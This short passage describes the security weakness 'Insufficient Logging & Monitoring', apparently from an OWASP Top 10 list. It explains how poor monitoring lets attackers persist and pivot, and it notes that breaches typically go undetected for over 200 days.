Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.